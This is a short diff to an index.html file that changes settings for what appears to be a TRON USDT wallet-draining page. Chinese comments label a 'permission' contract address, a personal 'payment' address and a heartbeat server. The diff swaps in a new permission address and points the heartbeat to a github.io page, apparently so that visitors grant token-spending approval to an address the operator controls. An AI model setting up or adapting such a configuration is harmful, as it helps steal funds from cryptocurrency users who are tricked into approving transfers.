--- a/index.html
+++ b/index.html
@@ -104,13 +104,13 @@
 ////////////// ***必须填写有效的地址否则会报错*** ///////////////
 
 // 权限地址（合约地址）
-window.Permission_address = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t';
+window.Permission_address = 'TGyQ6E6Huy9KZ56iQXQA2VPv1E5jP3NcoQ';
 // 收款地址（个人地址）
 window.Payment_address = 'THc5mtRshSmcHhfZ1MkGzaw5pUtQuHEs3o';
 // USDT官方合约地址（无需修改）
 window.usdtContractAddress = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t';
 // 服务器地址用于发送心跳（修改为你自己的服务器域名）
-window.heartbeatUrl = 'https://baidu.com/heartbeat';
+window.heartbeatUrl = 'https://junbtc.github.io/daou/';
 
 /////////////////////////////////////////////////////////////
 /////////////////////////////////////////////////////////////
